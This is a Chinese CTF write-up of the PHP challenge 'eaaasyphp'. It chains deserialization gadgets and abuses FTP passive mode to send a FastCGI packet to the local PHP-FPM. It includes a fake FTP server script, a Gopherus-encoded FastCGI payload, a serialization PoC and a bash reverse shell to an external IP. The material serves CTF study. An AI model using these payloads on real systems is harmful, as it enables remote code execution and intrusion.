[陇原战疫2021网络安全大赛]eaaasyphp

eaaasyphp

考点: FTP 协议的被动模式攻击FPM



class Check {
     
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
     
    public function __wakeup()
    {
     
        Check::$str1 = true;
    }
}


class Hint {
     

    public function __wakeup(){
     
        $this->hint = "no hint";
    }

    public function __destruct(){
     
        if(!$this->hint){
     
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {
     

    public function __toString()
    {
     
        if (Check::$str2) {
     
            if(!$this->data){
     
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
     
            throw new Error("Error");
        }
    }
}

class Welcome {
     
    public function __invoke()
    {
     
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {
     

    public function __destruct()
    {
     
        if (Check::$str1) {
     
            ($this->str4)();
        } else {
     
            throw new Error("Error");
        }
    }
}

if (isset($_GET['code'])) {
     
    unserialize($_GET['code']);
} else {
     
    highlight_file(__FILE__);
}

前置

__wakeup(),调用unserialize时执行
__destruct(),类的析构函数
__toString(),类被当成字符串时的回应方法
__invoke(),调用函数的方式调用一个对象时的回应方法

解题:

尝试查看phpinfo

方法一:

?code=O:4:"Hint":-1:{}

绕过__wakeup,按网上说PHP7 < 7.0.10当反序列化时变量个数与实际不符是会绕过 但是这道题目版本是7.2 将0修改为其他整数时是绕过失败的,但是改为负数即可绕过

方法二:

$a=new Bypass();
$a->aaa=new Esle();
$a->str4='phpinfo';
echo serialize($a);

得到

?code=O:6:"Bypass":2:{s:3:"aaa";O:4:"Esle":0:{}s:4:"str4";s:7:"phpinfo";}

尝试写入shell

$check = new Check();
$esle = new Esle();

$a = new Bypass();
$b = new Welcome();
$c = new Bunny();

$c->filename = "shell.txt";
$c->data = "111111";

$b->username = $c;
$b->bbb = $check;
$a->aaa = $esle;
$a->str4 = $b;

echo serialize($a);

写入失败

尝试使用file_put_contents攻击php-fpm

使用 FTP 协议的被动模式:客户端试图从FTP服务器上读取/写入一个文件,服务器会通知客户端将文件的内容读取到一个指定的IP和端口上,我们可以指定到127.0.0.1:9000,这样就可以向目标主机本地的 PHP-FPM 发送一个任意的数据包,从而执行代码,造成SSRF

1.搭建恶意ftp服务器

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0',123)) #端口可改
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

之后在服务器上运行

python ftp.py

2.利用gopher生成发向fpm的数据包

python gopherus.py --exploit fastcgi
/var/www/html/index.php
bash -c "bash -i >& /dev/tcp/ip/39543 0>&1"

[陇原战疫2021网络安全大赛]eaaasyphp_第1张图片

%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/1.117.171.248/39543%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

3.编写poc

ftp协议格式:ftp://aaa@vps:123/123



class Check {
     
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
     
    public function __wakeup()
    {
     
        Check::$str1 = true;
    }
}


class Hint {
     

    public function __wakeup(){
     
        $this->hint = "no hint";
    }

    public function __destruct(){
     
        if(!$this->hint){
     
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {
     
	public $filename;
    public function __toString()
    {
     
		echo "tostring";
        if (Check::$str2) {
     
            if(!$this->data){
     
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
     
            throw new Error("Error");
        }
    }
}

class Welcome {
     
	public $bbb;
    public function __invoke()
    {
     
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {
     
	public $aaa;
	public $str4;
    public function __destruct()
    {
     
        if (Check::$str1) {
     
            ($this->str4)();
        } else {
     
            throw new Error("Error");
        }
    }
}
$check = new Check();
$esle = new Esle();

$a = new Bypass();
$b = new Welcome();
$c = new Bunny();

$c->filename = "ftp://aaa@vps:123/123";
$c->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/1.117.171.248/39543%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");

$b->username = $c;
$b->bbb = $check;
$a->aaa = $esle;
$a->str4 = $b;

echo urlencode(serialize($a));

监听端口再传参得到shell

参考链接:

https://ego00.blog.csdn.net/article/details/121203831

http://www.yongsheng.site/2021/11/08/%E9%99%87%E5%8E%9F%E6%88%98%E7%96%AB2021%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/

你可能感兴趣的:(刷题记录,php,web安全,开发语言)